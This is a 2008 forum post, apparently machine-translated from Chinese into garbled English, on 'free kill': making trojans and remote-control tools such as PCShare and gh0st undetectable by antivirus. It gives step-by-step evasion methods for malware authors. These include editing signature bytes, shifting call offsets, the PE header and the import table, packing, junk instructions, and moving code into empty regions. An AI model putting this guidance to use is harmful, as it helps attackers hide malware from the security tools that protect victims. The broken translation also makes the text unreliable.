Share Trojan-free kill technology experience-vulnerability warning-the black bar safety net

2008-05-24T00:00:00
ID MYHACK58:62200819136
Type myhack58
Reporter 佚名
Modified 2008-05-24T00:00:00

Description

Trojan horsefree kill,in the country should originate in the 0 to 5 years. From then on a single feature of the code is now a composite signature,antivirus software from Active defense to Active Defense. Free to killtechnology is increasingly difficult. But plus ça change--change the feature code. Now some of the auxiliary software, the behavior of killing.

The following explanations are based on remote control software, for example, (add here a concept,the Trojans bounce technology,is the service end of the actively connected client. What is the initiative connected to it,you just put the client software on the machine is turned on,the horse loom will take the initiative to connect on your that the software,without having to go find his IP,then connected with him,thus eliminating a lot of trouble)

Because now the Proactive Defense too tough,especially Kabbah,rising's active Defense is based on the feature code,so it's easy too. Selected remote control software when should a itself through the mollusc,such as PCSHARE,iRaT+Classic,gh0st, etc., I personally think that a few software are good,andfree to killis easy.

Acts of killing:most of the Trojan with the default release path,and after installation there are a few specific terms,such as dove gray installed,with the"Dove gray installation","black anti-Pigeon"after installation had the"Black anti-special edition,"and other words,these are acts as killing the Trojans feature. Configure time to path get rid of,configured with C32ASM put inside the characters after the Find replace you can.

The most critical I think is the feature code,maybe most of the people think it's the active Defense. Because from my horse experience,like PCshare,iRaT+Classic, etc., as long as the changed signature,take the initiative shines through. Because the software itself through the anti-virus main anti -. Talk about I changed my pattern of experience.:

1,Locate the feature code,do not hurry to change the feature code,should first look at the front and rear,我 定位 PCSHARE 的 时候 定位 出 system.sys(the decimal point is to be killed, that is, feature code, and I put a decimal point in front of the system changed to uppercase after the that antivirus. That said, Don't locate where, to where.

2,the positioning to the CAll, you should try this: example, the positioning to the call 1 2 3 4 5 6 7 8,such a, you try to change call 1 2 3 4 5 6 7 7, that is minus 1, This method is very useful

  1. Positioned to the PE header, it should be PE head Shift, I detailed speaking, this online look at the method, very simple, just a simple calculation a bit, shift a bit. The second method, I listen to the group friends say, but they haven't tried, is to use a compass plus a lower shell, and then the shelling, so you canfree kill, the

4,the positioning to the input table, is also a corresponding shift, this online method is also very much. Because the is talking about well, so is not described in detail, just hint about it, Your in search offree to killmethod at the same time, will learn a lot

5,The fifth is the plus one minus one method, if the positioning to the number or other symbol, the plus one minus one a try, this I also tried, sometimes quite useful

6,first add a shell, and then locate feature code, which could reduce features of the code modifications.

  1. The jump method. Find a zero area, or insert themselves a better, the code is moved to the zero area, which is a commonly used method

  2. Deal with Kappa, the flower instructions are very effective, flower instruction how to write it, the first flowers Instructions Is a bunch of nonsense, of no use, you only have to do is to maintain the stack in balance, or to make an error.

9,learnfree killshould understand some of the hex tool, compilation tool, and should also know some Assembly, and other changes much better. Recommend everyone to go next with the web: www.pediy.com(this is a big famous site, see snow Forum, the 还有 甲壳虫 www.jksing.com/bbs 里面 有 很 多 的free to killdata will also from time to time published some of the free of DAT file.